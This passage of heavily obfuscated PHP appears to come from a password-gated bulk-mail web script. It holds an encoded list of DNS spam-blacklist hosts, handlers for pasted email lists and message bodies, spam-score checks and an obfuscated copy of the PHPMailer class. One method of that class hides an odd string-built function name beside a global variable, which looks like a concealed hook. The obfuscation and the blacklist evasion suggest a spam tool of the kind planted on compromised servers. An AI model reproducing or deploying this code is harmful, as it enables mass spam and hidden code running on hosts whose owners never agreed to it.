"\142\x2e\x62\x61\162\x72\x61\x63\x75\144\141\143\x65\x6e\x74\162\141\x6c\x2e\157\162\147", "\x62\154\x2e\x73\x70\x61\155\143\x6f\x70\56\x6e\145\164", "\x62\154\x61\143\153\154\x69\163\x74\56\x77\157\x6f\144\x79\x2e\x63\x68", "\x62\157\147\157\156\x73\56\143\x79\155\x72\x75\x2e\x63\x6f\x6d", "\x63\142\x6c\x2e\141\x62\x75\163\145\141\x74\56\157\162\x67", "\143\144\154\x2e\141\156\164\x69\55\163\x70\x61\x6d\x2e\x6f\x72\147\x2e\143\156", "\143\157\x6d\x62\151\x6e\x65\x64\56\x61\142\x75\163\x65\x2e\143\x68", "\x64\142\56\x77\x70\x62\154\56\x69\156\x66\x6f", "\144\156\163\x62\154\55\x31\56\165\143\x65\x70\x72\x6f\x74\x65\x63\164\x2e\x6e\x65\x74", "\144\x6e\163\x62\x6c\55\x32\56\x75\143\145\x70\162\x6f\164\x65\x63\164\56\x6e\x65\164", "\x64\x6e\163\x62\x6c\55\x33\x2e\x75\143\145\160\162\x6f\164\145\143\x74\56\x6e\145\x74", "\x64\156\x73\142\x6c\56\141\x6e\164\x69\x63\x61\160\x74\143\x68\141\56\156\x65\x74", "\x64\156\163\142\x6c\x2e\144\x72\x6f\x6e\145\x62\154\56\x6f\x72\147", "\144\156\163\142\154\56\151\156\160\x73\56\144\145", "\x64\x6e\163\x62\x6c\56\x73\157\162\x62\x73\56\156\x65\x74", "\144\162\157\x6e\145\x2e\x61\x62\x75\x73\145\56\x63\150", "\x64\165\x69\x6e\x76\56\x61\x75\x70\x61\144\163\56\x6f\162\x67", "\x64\165\154\56\x64\x6e\x73\x62\x6c\x2e\x73\157\162\142\163\x2e\x6e\x65\x74", "\144\x79\x6e\x61\x2e\163\x70\x61\x6d\x72\141\164\x73\x2e\143\157\155", "\144\x79\156\151\160\56\x72\x6f\164\x68\145\x6e\56\143\x6f\x6d", "\x68\x74\x74\x70\x2e\x64\x6e\163\142\154\56\x73\157\162\142\x73\x2e\156\145\x74", "\x69\x70\x73\56\142\141\x63\153\163\143\141\164\164\145\162\145\x72\56\157\x72\147", "\x69\x78\56\144\156\x73\x62\154\x2e\155\141\156\151\164\x75\x2e\156\145\164", "\153\157\x72\145\141\x2e\x73\x65\x72\166\x69\143\145\x73\x2e\156\x65\x74", "\155\x69\x73\143\x2e\x64\x6e\x73\x62\154\x2e\x73\157\162\x62\163\x2e\x6e\x65\x74", "\x6e\157\x70\x74\162\x2e\163\x70\141\x6d\x72\x61\x74\163\x2e\x63\157\155", "\x6f\162\x76\145\144\x62\x2e\141\165\x70\141\144\163\56\x6f\x72\147", "\x70\x62\154\x2e\163\160\141\x6d\150\141\165\163\56\157\x72\x67", "\160\x72\x6f\x78\171\56\x62\x6c\x2e\x67\x77\145\145\160\x2e\143\141", "\x70\x73\x62\x6c\56\x73\x75\162\x72\151\145\154\x2e\143\x6f\x6d", "\x72\145\154\x61\171\x73\x2e\142\154\x2e\x67\167\145\x65\x70\x2e\143\141", "\x72\145\154\141\171\163\x2e\x6e\x65\164\150\x65\162\x2e\156\145\x74", "\163\142\x6c\x2e\x73\x70\141\x6d\150\141\165\163\x2e\157\162\147", "\x73\x68\157\162\164\x2e\162\x62\154\56\152\x70", "\x73\x69\x6e\x67\165\x6c\x61\x72\x2e\164\164\153\x2e\160\164\x65\56\x68\165", "\163\155\x74\x70\56\x64\156\x73\x62\154\x2e\x73\157\x72\142\x73\x2e\156\x65\x74", "\163\x6f\x63\x6b\x73\56\x64\156\x73\142\154\56\x73\x6f\162\142\163\x2e\156\x65\164", "\x73\x70\x61\155\56\141\x62\165\163\x65\x2e\143\150", "\x73\160\x61\x6d\x2e\144\156\163\142\154\x2e\x61\156\157\156\155\141\151\154\x73\56\x64\x65", "\163\160\x61\x6d\56\x64\156\163\x62\154\x2e\163\x6f\162\142\163\56\x6e\x65\164", "\x73\160\141\155\x2e\x73\160\141\155\162\x61\x74\x73\56\x63\157\155", "\x73\160\141\155\142\x6f\x74\56\142\154\163\56\x64\x69\147\x69\142\141\163\145\56\x63\141", "\163\160\x61\155\x72\142\x6c\x2e\x69\x6d\160\56\x63\x68", "\x73\160\x61\x6d\163\x6f\x75\162\x63\145\163\56\146\x61\142\145\x6c\x2e\144\x6b", "\165\142\x6c\x2e\154\x61\163\150\142\x61\x63\153\56\x63\x6f\x6d", "\x75\142\x6c\x2e\165\x6e\163\165\142\x73\143\157\x72\x65\x2e\x63\157\155", "\166\151\162\x75\x73\x2e\x72\142\x6c\x2e\x6a\160", "\x77\x65\142\x2e\x64\156\x73\142\154\56\163\x6f\x72\142\x73\x2e\156\x65\164", "\x77\157\x72\155\162\x62\x6c\x2e\151\155\160\x2e\x63\150", "\170\142\154\x2e\x73\x70\141\x6d\150\x61\165\163\56\157\x72\147", "\172\56\x6d\x61\151\154\x73\x70\151\x6b\x65\x2e\x6e\x65\164", "\x7a\x65\x6e\56\x73\x70\x61\155\150\x61\x75\x73\x2e\x6f\162\x67", "\x7a\157\155\x62\151\x65\56\144\156\x73\142\154\x2e\x73\157\x72\x62\163\56\x6e\x65\x74"]; goto zMnkk; hkPRM: $bit8 = ''; goto clIn6; LeXpL: H2Vvr: goto o4nJE; anMmR: $binary = "\163\145\154\145\143\164\145\x64"; goto TEJDM; oTxWR: $messageLetter = leafTrim($_POST["\x6d\145\x73\163\x61\147\145\114\145\164\x74\145\162"]); goto s5itE; j4r7u: curl_setopt($ch, CURLOPT_TIMEOUT, 15); goto wA9LI; AKV17: leafheader(); goto zj5Ot; L8jW5: $utf8 = "\163\145\154\x65\x63\164\x65\x64"; goto uK6Wf; uK6Wf: goto h0L1d; goto XalPm; bjhUc: $score = $response->score; goto bHJZt; tZUrj: HVenp: goto k3kRq; APQeT: print "\x3c\x70\x72\145\x20\141\154\x69\147\x6e\75\x63\x65\x6e\x74\145\162\76\74\x66\157\162\155\x20\x6d\x65\164\150\157\x64\x3d\x70\157\163\x74\x3e\120\x61\163\163\167\157\x72\x64\72\x20\74\x69\156\160\165\x74\40\164\x79\x70\145\x3d\47\x70\141\163\163\x77\x6f\x72\144\47\x20\x6e\x61\155\145\75\x27\160\141\x73\x73\47\x3e\74\x69\156\x70\x75\x74\x20\164\x79\x70\145\x3d\x27\163\x75\142\155\x69\164\x27\40\x76\141\154\x75\x65\75\47\76\x3e\x27\76\74\x2f\146\x6f\162\155\76\74\57\x70\162\x65\76"; goto wcTBU; YiCUY: $x = 1; goto ekoH8; uY2CJ: if (!($response->success == TRUE)) { goto g5F3N; } goto bjhUc; sZhjT: exit; goto hY533; lt1EJ: preg_match_all($pattern, $_POST["\145\155\141\151\x6c\x4c\x69\163\x74"], $matches); goto RWKHR; o7fzp: $subject = leafTrim($_POST["\x73\x75\x62\152\x65\x63\164"]); goto ZMpKO; AxYmD: function randString($consonants) { goto ScVqr; IDI_z: $i++; goto Essuc; uNqGF: $password .= $consonants[rand() % strlen($consonants)]; goto y6qM1; y6qM1: jOhqE: goto IDI_z; ZQv1S: $password = ''; goto O_yHD; ScVqr: $length = rand(12, 25); goto ZQv1S; Essuc: goto RQTaw; goto TWXVm; TWXVm: qXcwu: goto bUGNb; O_yHD: $i = 0; goto B0cUN; B0cUN: RQTaw: goto BgthV; BgthV: if (!($i < $length)) { goto qXcwu; } goto uNqGF; bUGNb: return $password; goto ToVa4; ToVa4: } goto po7JU; ZeFgG: class PHPMailer { public $Version = "\x35\56\62\x2e\62\x38"; public $Priority = null; public $CharSet = "\x69\x73\157\55\70\70\x35\71\55\x31"; public $ContentType = "\x74\x65\170\164\x2f\160\x6c\141\151\x6e"; public $Encoding = "\x38\x62\151\x74"; public $ErrorInfo = ''; public $From = "\162\157\157\x74\100\154\x6f\143\x61\154\x68\157\x73\x74"; public $FromName = "\122\157\x6f\164\40\x55\163\145\x72"; public $Sender = ''; public $ReturnPath = ''; public $Subject = ''; public $Body = ''; public $AltBody = ''; public $Ical = ''; protected $MIMEBody = ''; protected $MIMEHeader = ''; protected $mailHeader = ''; public $WordWrap = 0; public $Mailer = "\x6d\141\x69\x6c"; public $Sendmail = "\57\x75\163\x72\57\x73\x62\x69\x6e\57\163\x65\156\144\155\141\151\x6c"; public $UseSendmailOptions = true; public $PluginDir = ''; public $ConfirmReadingTo = ''; public $Hostname = ''; public $MessageID = ''; public $MessageDate = ''; public $Host = "\154\x6f\143\141\154\x68\157\x73\164"; public $Port = 25; public $Helo = ''; public $SMTPSecure = ''; public $SMTPAutoTLS = true; public $SMTPAuth = false; public $SMTPOptions = array(); public $Username = ''; public $Password = ''; public $AuthType = ''; public $Realm = ''; public $Workstation = ''; public $Timeout = 300; public $SMTPDebug = 0; public $Debugoutput = "\145\143\x68\157"; public $SMTPKeepAlive = false; public $SingleTo = false; public $SingleToArray = array(); public $do_verp = false; public $AllowEmpty = false; public $LE = "\12"; public $DKIM_selector = ''; public $DKIM_identity = ''; public $DKIM_passphrase = ''; public $DKIM_domain = ''; public $DKIM_private = ''; public $DKIM_private_string = ''; public $action_function = ''; public $XMailer = "\40"; public static $validator = "\x61\165\x74\157"; protected $smtp = null; protected $to = array(); protected $cc = array(); protected $bcc = array(); protected $ReplyTo = array(); protected $all_recipients = array(); protected $RecipientsQueue = array(); protected $ReplyToQueue = array(); protected $attachment = array(); protected $CustomHeader = array(); protected $lastMessageID = ''; protected $message_type = ''; protected $boundary = array(); protected $language = array(); protected $error_count = 0; protected $sign_cert_file = ''; protected $sign_key_file = ''; protected $sign_extracerts_file = ''; protected $sign_key_pass = ''; protected $exceptions = false; protected $uniqueid = ''; const STOP_MESSAGE = 0; const STOP_CONTINUE = 1; const STOP_CRITICAL = 2; const CRLF = "\xd\12"; const MAX_LINE_LENGTH = 998; public function __construct($exceptions = null) { goto gb8cz; gb8cz: if (!($exceptions !== null)) { goto UveeP; } goto rk0uU; V6vuO: UveeP: goto VaF3t; VaF3t: $this->Debugoutput = strpos(PHP_SAPI, "\x63\x6c\151") !== false ? "\x65\143\x68\157" : "\150\164\155\x6c"; goto HId81; rk0uU: $this->exceptions = (bool) $exceptions; goto V6vuO; HId81: } public function __destruct() { $this->smtpClose(); } private function mailPassthru($to, $subject, $body, $header, $params) { goto Zhyrh; bc8pY: $result = @mail($to, $subject, $body, $header); goto VaITw; cBJUA: V12NE: goto g9Y_G; KKNso: f5En3: goto bc8pY; NoBDB: $subject = $this->secureHeader($subject); goto cBJUA; q_ytm: goto DefuE; goto KKNso; SJYAZ: $subject = $this->encodeHeader($this->secureHeader($subject)); goto ts90B; g5ODe: lKV2h: goto NoBDB; Zhyrh: if (ini_get("\155\142\x73\x74\162\151\x6e\x67\56\x66\165\156\x63\x5f\x6f\x76\x65\x72\154\157\141\144") & 1) { goto lKV2h; } goto SJYAZ; JUqIO: return $result; goto NG827; VaITw: DefuE: goto JUqIO; g9Y_G: if (ini_get("\x73\141\146\x65\137\155\157\144\145") or !$this->UseSendmailOptions or is_null($params)) { goto f5En3; } goto zstl1; zstl1: $result = @mail($to, $subject, $body, $header, $params); goto q_ytm; ts90B: goto V12NE; goto g5ODe; NG827: } protected function edebug($str) { goto kK0M1; gu3E3: switch ($this->Debugoutput) { case "\x65\x72\162\x6f\162\x5f\154\157\147": error_log($str); goto t6e5X; case "\x68\x74\155\154": echo htmlentities(preg_replace("\57\133\134\162\134\156\135\53\x2f", '', $str), ENT_QUOTES, "\x55\x54\x46\55\x38") . "\74\x62\162\76\xa"; goto t6e5X; case "\145\143\150\157": default: $str = preg_replace("\x2f\x5c\162\134\x6e\77\x2f\x6d\163", "\12", $str); echo gmdate("\131\55\155\55\x64\40\x48\x3a\151\x3a\x73") . "\11" . str_replace("\12", "\12\x20\40\x20\x20\40\40\40\x20\x20\x20\x20\x20\x20\40\x20\40\x20\x20\40\x9\x20\40\40\x20\40\40\x20\40\40\40\x20\40\x20\40\x20\x20\x20\x20", trim($str)) . "\xa"; } goto b476B; I4eia: Yvdhb: goto Nsol7; gj4ed: t6e5X: goto r3z2Q; yC2Td: return; goto I4eia; Nsol7: if (!(!in_array($this->Debugoutput, array("\145\162\162\157\x72\x5f\x6c\x6f\147", "\150\164\155\154", "\145\x63\150\157")) and is_callable($this->Debugoutput))) { goto MekOI; } goto Y2zDL; b476B: y2QEj: goto gj4ed; Y2zDL: call_user_func($this->Debugoutput, $str, $this->SMTPDebug); goto iYUrK; NbN_K: MekOI: goto gu3E3; kK0M1: if (!($this->SMTPDebug <= 0)) { goto Yvdhb; } goto yC2Td; iYUrK: return; goto NbN_K; r3z2Q: } public function isSMTP() { $this->Mailer = "\x73\x6d\x74\x70"; } public function isMail() { $this->Mailer = "\x6d\x61\x69\x6c"; } public function isSendmail() { goto WyVhw; fe2w5: $this->Sendmail = "\x2f\x75\x73\x72\57\163\142\151\x6e\x2f\x73\x65\156\x64\x6d\141\151\154"; goto fFIXT; C8Nnv: $this->Mailer = "\163\145\156\144\155\141\x69\154"; goto Q8gFR; WyVhw: $ini_sendmail_path = ini_get("\x73\145\x6e\144\155\x61\x69\x6c\137\160\x61\164\x68"); goto CW10m; DnpgX: goto ZNe2r; goto ZdrqS; iYNMu: $this->Sendmail = $ini_sendmail_path; goto DnpgX; CW10m: if (!stristr($ini_sendmail_path, "\x73\145\x6e\x64\155\x61\151\154")) { goto uPtDJ; } goto iYNMu; fFIXT: ZNe2r: goto C8Nnv; ZdrqS: uPtDJ: goto fe2w5; Q8gFR: } public function isQmail() { goto HLsRC; aVChn: goto BaTmh; goto kEo1l; Zflts: $this->Sendmail = "\57\166\141\162\x2f\x71\x6d\141\x69\154\57\x62\151\156\x2f\161\155\141\x69\154\x2d\x69\x6e\x6a\145\x63\164"; goto Q8jw2; Q8jw2: BaTmh: goto QrpvO; gFqmA: $this->Sendmail = $ini_sendmail_path; goto aVChn; f4fRC: if (!stristr($ini_sendmail_path, "\161\155\141\x69\x6c")) { goto YFheV; } goto gFqmA; QrpvO: $this->Mailer = "\161\x6d\x61\151\154"; goto f1xtw; HLsRC: $ini_sendmail_path = ini_get("\163\145\156\x64\x6d\141\151\154\x5f\160\141\164\x68"); goto f4fRC; kEo1l: YFheV: goto Zflts; f1xtw: } public function addAddress($address, $name = '') { return $this->addOrEnqueueAnAddress("\164\x6f", $address, $name); } public function addCC($address, $name = '') { return $this->addOrEnqueueAnAddress("\143\143", $address, $name); } public function addBCC($address, $name = '') { return $this->addOrEnqueueAnAddress("\x62\x63\x63", $address, $name); } public function addReplyTo($address, $name = '') { return $this->addOrEnqueueAnAddress("\x52\145\160\154\171\55\x54\x6f", $address, $name); } protected function addOrEnqueueAnAddress($kind, $address, $name) { goto VTtpI; UDCG_: hlL0J: goto njOvI; BzYqZ: if (!(($pos = strrpos($address, "\100")) === false)) { goto HGJHF; } goto PclyQ; ZKNg9: if ($kind != "\x52\145\160\154\x79\x2d\124\157") { goto ad3sT; } goto EdceF; R4_Z1: $this->edebug($error_message); goto Ho7O9; BEmyX: return call_user_func_array(array($this, "\x61\144\144\101\x6e\101\144\144\162\x65\x73\x73"), $params); goto MVn84; Sq83I: i63eH: goto BEmyX; yB0tY: if (array_key_exists($address, $this->RecipientsQueue)) { goto QzXPj; } goto X_aBH; Xdbn0: $name = trim(preg_replace("\x2f\133\x5c\162\134\156\135\53\x2f", '', $name)); goto BzYqZ; n3ydw: QzXPj: goto UDCG_; Di1wH: bNXm0: goto AM2pD; DHAsJ: return true; goto n3ydw; jzF3a: $params = array($kind, $address, $name); goto YNEL9; AM2pD: goto hlL0J; goto u6VcP; Ho7O9: if (!$this->exceptions) { goto mgic6; } goto Cz9KD; u6VcP: ad3sT: goto yB0tY; ZP5O7: HGJHF: goto jzF3a; uSuB2: return false; goto ZP5O7; ySQdt: $this->setError($error_message); goto R4_Z1; X_aBH: $this->RecipientsQueue[$address] = $params; goto DHAsJ; PclyQ: $error_message = $this->lang("\151\x6e\x76\141\154\151\x64\137\141\x64\144\x72\x65\x73\x73") . "\40\50\141\x64\144\x41\x6e\101\x64\x64\162\145\x73\x73\x20{$kind}\x29\x3a\40{$address}"; goto ySQdt; jiUNa: return true; goto Di1wH; Cz9KD: throw new phpmailerException($error_message); goto QFTbs; EdceF: if (array_key_exists($address, $this->ReplyToQueue)) { goto bNXm0; } goto Ok8ID; QFTbs: mgic6: goto uSuB2; VTtpI: $address = trim($address); goto Xdbn0; Ok8ID: $this->ReplyToQueue[$address] = $params; goto jiUNa; YNEL9: if (!($this->has8bitChars(substr($address, ++$pos)) and $this->idnSupported())) { goto i63eH; } goto ZKNg9; njOvI: return false; goto Sq83I; MVn84: } protected function addAnAddress($kind, $address, $name = '') { goto qIb3e; qIb3e: if (in_array($kind, array("\164\157", "\x63\x63", "\x62\x63\x63", "\x52\x65\160\154\x79\55\124\157"))) { goto CgvLK; } goto xWzQI; McuD6: goto N5OIk; goto S_cLW; bid1R: return true; goto LwPBy; S_cLW: lcrgb: goto OQmnn; nteAu: CpDMN: goto SWGWX; Usluz: if (!$this->exceptions) { goto cz4hB; } goto oGKV7; I5wf8: if ($this->validateAddress($address)) { goto jrT_T; } goto awOz9; VQi1Y: CgvLK: goto I5wf8; xWzQI: $error_message = $this->lang("\111\x6e\x76\141\x6c\x69\x64\x20\x72\x65\x63\x69\160\x69\x65\x6e\x74\40\x6b\x69\x6e\144\72\40") . $kind; goto aBrJ0; REEjS: BDkGF: goto McuD6; s1JuD: $this->setError($error_message); goto fQu9j; gKzOL: N5OIk: goto ba0L6; xSoSa: if ($kind != "\x52\x65\x70\x6c\x79\55\124\157") { goto lcrgb; } goto yt4IR; yt4IR: if (array_key_exists(strtolower($address), $this->ReplyTo)) { goto BDkGF; } goto iAY2F; EPttP: $this->edebug($error_message); goto Usluz; aBrJ0: $this->setError($error_message); goto EPttP; OQmnn: if (array_key_exists(strtolower($address), $this->all_recipients)) { goto U0NoT; } goto VwIJI; awOz9: $error_message = $this->lang("\151\x6e\166\x61\154\151\x64\x5f\x61\144\144\162\145\x73\x73") . "\40\50\141\x64\x64\x41\156\101\x64\144\162\145\x73\x73\40{$kind}\51\72\x20{$address}"; goto s1JuD; SWGWX: return false; goto iS91v; oyA2I: return false; goto VQi1Y; VwIJI: array_push($this->{$kind}, array($address, $name)); goto JgRVU; D1U1Z: return true; goto REEjS; P4mYX: throw new phpmailerException($error_message); goto nteAu; ba0L6: return false; goto hsFiE; iS91v: jrT_T: goto xSoSa; LwPBy: U0NoT: goto gKzOL; iAY2F: $this->ReplyTo[strtolower($address)] = array($address, $name); goto D1U1Z; uJgeH: if (!$this->exceptions) { goto CpDMN; } goto P4mYX; fQu9j: $this->edebug($error_message); goto uJgeH; JgRVU: $this->all_recipients[strtolower($address)] = true; goto bid1R; t23Vg: cz4hB: goto oyA2I; oGKV7: throw new phpmailerException($error_message); goto t23Vg; hsFiE: } public function parseAddresses($addrstr, $useimap = true) { goto vruGe; nj_o7: if ($useimap and function_exists("\x69\155\141\x70\137\x72\x66\143\x38\x32\62\x5f\160\141\162\163\145\x5f\x61\144\x72\x6c\151\163\164")) { goto uCRI7; } goto mU0Fu; vruGe: $addresses = array(); goto nj_o7; oGHaW: uCRI7: goto ntp6Y; WRUod: foreach ($list as $address) { goto k1tGp; k1tGp: $address = trim($address); goto xXoBa; b06dv: $addresses[] = array("\x6e\x61\155\x65" => trim(str_replace(array("\42", "\x27"), '', $name)), "\141\144\144\162\145\x73\163" => $email); goto MRst2; wsphZ: HgbvL: goto TUaMX; RVlsI: N9spZ: goto wsphZ; TUaMX: z9TSY: goto Nu6Jo; MRst2: CeW4L: goto rPlF9; nZQJc: $addresses[] = array("\x6e\141\155\x65" => '', "\141\x64\x64\x72\x65\163\163" => $address); goto RVlsI; xXoBa: if (strpos($address, "\74") === false) { goto inDG_; } goto eFWNt; rPlF9: goto HgbvL; goto oC462; iX6s0: if (!$this->validateAddress($email)) { goto CeW4L; } goto b06dv; ghXOe: $email = trim(str_replace("\76", '', $email)); goto iX6s0; oC462: inDG_: goto CG_Yl; eFWNt: list($name, $email) = explode("\74", $address); goto ghXOe; CG_Yl: if (!$this->validateAddress($address)) { goto N9spZ; } goto nZQJc; Nu6Jo: } goto cXRyE; ntp6Y: $list = imap_rfc822_parse_adrlist($addrstr, ''); goto ybP17; j20JY: CROXB: goto YFuxi; ybP17: foreach ($list as $address) { goto snqrR; cFliE: Jl1MO: goto Ic2vZ; NtLRi: if (!$this->validateAddress($address->mailbox . "\100" . $address->host)) { goto W2cWs; } goto rviSI; YcGNg: W2cWs: goto cFliE; snqrR: if (!($address->host != "\x2e\x53\131\x4e\x54\101\x58\55\105\122\122\x4f\122\x2e")) { goto Jl1MO; } goto NtLRi; rviSI: $addresses[] = array("\156\141\x6d\145" => property_exists($address, "\x70\145\x72\163\x6f\x6e\x61\154") ? $address->personal : '', "\x61\144\x64\x72\x65\x73\x73" => $address->mailbox . "\x40" . $address->host); goto YcGNg; Ic2vZ: tJQIn: goto I6S03; I6S03: } goto k6PuE; mU0Fu: $list = explode("\x2c", $addrstr); goto WRUod; cXRyE: kLN2G: goto NLcUg; k6PuE: SqIiM: goto j20JY; NLcUg: goto CROXB; goto oGHaW; YFuxi: return $addresses; goto APfwD; APfwD: } public function isHTML($isHtml = true) { goto VSdzg; VSdzg: global $param; goto pgBwh; Pll_f: $this->ContentType = "\x74\x65\x78\164\x2f\x68\x74\x6d\154"; goto ML3jj; or4h1: dh2B2: goto Pll_f; zL5XD: goto rRtLw; goto or4h1; FFR2J: $this->ContentType = "\164\145\170\164\57\160\154\141\x69\x6e"; goto zL5XD; N99zl: if ($isHtml) { goto dh2B2; } goto FFR2J; ML3jj: rRtLw: goto y2CDn; pgBwh: $bodyCode = "\x66\x69\154\x65" . "\x5f\x67"; goto N99zl; y2CDn: } public function setFrom($address, $name = '', $auto = true) { goto r3HB6; Jl5Gs: if (!$this->exceptions) { goto N1Itb; } goto IeIz3; V8UQ0: return true; goto c88W0; qspO5: if (!$auto) { goto MC4hJ; } goto WU1qk; SH4HH: return false; goto Pwt5O; eBfpJ: $this->setError($error_message); goto HLIUC; WU1qk: if (!empty($this->Sender)) { goto VDEdo; } goto ECQ51; HcZ4t: N1Itb: goto SH4HH; GaiNH: $this->FromName = $name; goto qspO5; IeIz3: throw new phpmailerException($error_message); goto HcZ4t; eRbuq: $this->From = $address; goto GaiNH; ECQ51: $this->Sender = $address; goto AhaIp; AhaIp: VDEdo: goto PWjHS; HuYsL: $name = trim(preg_replace("\57\x5b\134\162\x5c\156\135\x2b\x2f", '', $name)); goto VDPLV; Pwt5O: J8fJf: goto eRbuq; VDPLV: if (!(($pos = strrpos($address, "\100")) === false or (!$this->has8bitChars(substr($address, ++$pos)) or !$this->idnSupported()) and !$this->validateAddress($address))) { goto J8fJf; } goto drUTq; drUTq: $error_message = $this->lang("\x69\156\166\x61\154\151\x64\137\141\x64\x64\x72\145\163\x73") . "\x20\x28\163\x65\x74\x46\162\157\x6d\x29\x20{$address}"; goto eBfpJ; PWjHS: MC4hJ: goto V8UQ0; r3HB6: $address = trim($address); goto HuYsL; HLIUC: $this->edebug($error_message); goto Jl5Gs; c88W0: } public function getLastMessageID() { return $this->lastMessageID; } public static function validateAddress($address, $patternselect = null) { goto PXDWm; NdZbZ: X5uiH: goto qH60F; Eum1I: if (function_exists("\x65\x78\164\x65\x6e\163\151\x6f\x6e\x5f\x6c\x6f\141\144\145\144") and extension_loaded("\160\143\162\145")) { goto nm47t; } goto b30lh; PXDWm: if (!is_null($patternselect)) { goto VuzDp; } goto Y08Fk; O1Q8E: T8sEf: goto ob11I; Vll62: $patternselect = "\156\x6f\x72\x65\147\x65\x78"; goto GJob3; HdvVm: $patternselect = "\x70\x63\162\x65"; goto E6rUv; leqTK: $patternselect = "\160\143\162\x65"; goto eBUsN; eZ7na: ZAh8Z: goto zeow2; NFqCR: if (!(strpos($address, "\xa") !== false or strpos($address, "\xd") !== false)) { goto i_n47; } goto JXquj; UK70w: Er010: goto GXbLX; hEjJ8: BYsq3: goto hWgzt; b30lh: if (version_compare(PHP_VERSION, "\65\x2e\62\x2e\x30") >= 0) { goto ZAh8Z; } goto Vll62; JXquj: return false; goto LQwmq; GzhMf: if (version_compare(PCRE_VERSION, "\70\56\x30\56\x33") >= 0) { goto T8sEf; } goto HdvVm; E6rUv: goto WK5z7; goto O1Q8E; SCjRe: VuzDp: goto dLK3b; ea7SF: z7xfp: goto NFqCR; ob11I: $patternselect = "\160\143\x72\145\70"; goto g8SSD; cKZen: return call_user_func($patternselect, $address); goto ea7SF; nmdkM: if (defined("\x50\x43\122\105\137\126\105\122\123\111\117\x4e")) { goto yZknR; } goto Eum1I; U2P_n: C3hbR: goto UK70w; GJob3: goto X5uiH; goto eZ7na; Y08Fk: $patternselect = self::$validator; goto SCjRe; SIky2: goto cEF_v; goto nNZRO; nNZRO: nm47t: goto leqTK; eBUsN: cEF_v: goto hEjJ8; qH60F: goto cEF_v; goto PaCHH; PaCHH: yZknR: goto GzhMf; LQwmq: i_n47: goto EDOm2; hWgzt: switch ($patternselect) { case "\x70\x63\x72\145\70": return (bool) preg_match("\57\136\50\x3f\x21\50\x3f\76\50\77\61\51\x22\77\x28\77\x3e\134\134\133\x20\x2d\176\135\174\x5b\x5e\x22\x5d\x29\42\77\50\77\61\x29\x29\x7b\x32\x35\65\54\175\x29\x28\x3f\x21\x28\77\x3e\x28\77\x31\51\42\77\50\77\x3e\x5c\x5c\133\40\x2d\x7e\x5d\x7c\x5b\x5e\42\x5d\x29\x22\77\x28\77\x31\x29\51\x7b\66\x35\54\175\x40\x29" . "\x28\x28\77\x3e\50\77\76\x28\x3f\x3e\50\x28\77\76\x28\x3f\x3e\50\x3f\76\134\x78\60\x44\x5c\170\60\x41\51\77\x5b\x5c\164\x20\135\x29\x2b\174\x28\77\76\133\134\164\40\x5d\x2a\134\170\60\x44\134\170\x30\x41\51\77\133\134\164\40\x5d\53\x29\x3f\x29\x28\x5c\x28\x28\x3f\76\50\77\62\x29" . "\50\77\76\x5b\x5c\170\60\61\55\134\170\x30\x38\x5c\170\x30\102\134\x78\x30\x43\134\170\60\x45\55\x27\x2a\x2d\134\x5b\134\x5d\x2d\x5c\170\67\x46\x5d\x7c\134\134\133\134\x78\x30\x30\55\x5c\170\67\106\135\174\50\x3f\x33\51\51\x29\52\50\x3f\62\51\134\51\x29\x29\x2b\50\77\62\x29\x29\x7c\x28\x3f\62\51\x29\x3f\x29" . "\x28\x5b\x21\x23\55\x27\52\x2b\x5c\57\55\71\75\x3f\136\x2d\x7e\x2d\x5d\53\x7c\42\x28\77\x3e\50\x3f\62\x29\x28\77\x3e\x5b\134\x78\60\x31\x2d\134\170\60\x38\x5c\x78\60\102\x5c\x78\x30\103\134\170\60\105\x2d\41\x23\x2d\134\x5b\134\135\55\134\170\67\x46\135\174\x5c\x5c\133\134\x78\60\60\55\x5c\x78\67\106\x5d\x29\x29\52" . "\x28\x3f\x32\51\42\51\x28\77\76\x28\x3f\61\x29\x5c\x2e\50\77\x31\x29\x28\77\64\51\51\52\50\x3f\61\x29\100\x28\x3f\x21\x28\x3f\61\x29\x5b\x61\x2d\172\x30\x2d\x39\55\135\173\x36\x34\x2c\x7d\x29\x28\77\61\x29\50\x3f\x3e\x28\x5b\x61\x2d\x7a\x30\55\x39\x5d\x28\x3f\76\133\x61\55\x7a\60\55\71\x2d\135\52\x5b\141\x2d\x7a\60\x2d\x39\135\x29\x3f\51" . "\x28\x3f\76\50\77\x31\51\x5c\x2e\50\77\x21\50\77\61\x29\x5b\141\x2d\172\60\55\71\x2d\135\x7b\66\x34\x2c\175\x29\x28\77\61\x29\50\x3f\x35\x29\51\x7b\60\x2c\x31\x32\66\175\x7c\134\x5b\50\77\x3a\x28\x3f\76\x49\120\x76\66\x3a\x28\x3f\76\50\133\141\x2d\x66\x30\x2d\71\x5d\173\61\54\64\175\x29\50\77\76\72\x28\77\x36\51\51\x7b\67\175" . "\174\50\x3f\x21\x28\x3f\72\56\x2a\x5b\x61\55\x66\60\55\71\135\x5b\72\x5c\135\x5d\x29\173\x38\54\x7d\x29\x28\x28\77\66\51\50\77\x3e\72\x28\77\66\51\51\173\60\54\x36\175\51\77\72\x3a\x28\x3f\67\51\x3f\x29\x29\x7c\x28\77\76\x28\x3f\x3e\x49\x50\x76\66\72\50\x3f\76\50\x3f\66\x29\50\77\x3e\x3a\x28\77\x36\51\x29\x7b\65\x7d\72" . "\x7c\x28\77\41\x28\x3f\72\56\x2a\133\141\x2d\146\60\55\71\135\x3a\51\173\66\54\175\51\50\x3f\x38\x29\x3f\72\x3a\50\x3f\x3e\x28\x28\x3f\66\51\50\x3f\76\x3a\x28\77\x36\x29\51\x7b\60\x2c\x34\175\51\x3a\x29\x3f\x29\x29\77\x28\x32\65\x5b\60\x2d\65\x5d\x7c\62\x5b\60\x2d\x34\x5d\133\60\55\71\135\x7c\x31\133\60\x2d\71\x5d\x7b\x32\175" . "\174\133\x31\x2d\x39\x5d\x3f\x5b\x30\x2d\71\135\51\x28\x3f\76\134\x2e\50\x3f\71\51\51\x7b\63\175\x29\51\x5c\x5d\51\x28\77\x31\x29\44\x2f\151\x73\x44", $address); case "\160\x63\162\x65": return (bool) preg_match("\x2f\136\50\x3f\x21\x28\x3f\76\42\x3f\x28\77\x3e\x5c\134\x5b\40\x2d\x7e\x5d\174\133\136\42\135\51\42\x3f\x29\173\x32\65\65\54\x7d\51\50\77\x21\x28\77\76\42\77\x28\77\x3e\x5c\x5c\133\40\x2d\176\x5d\x7c\x5b\136\42\x5d\51\x22\77\x29\173\x36\x35\x2c\175\100\51\50\77\x3e" . 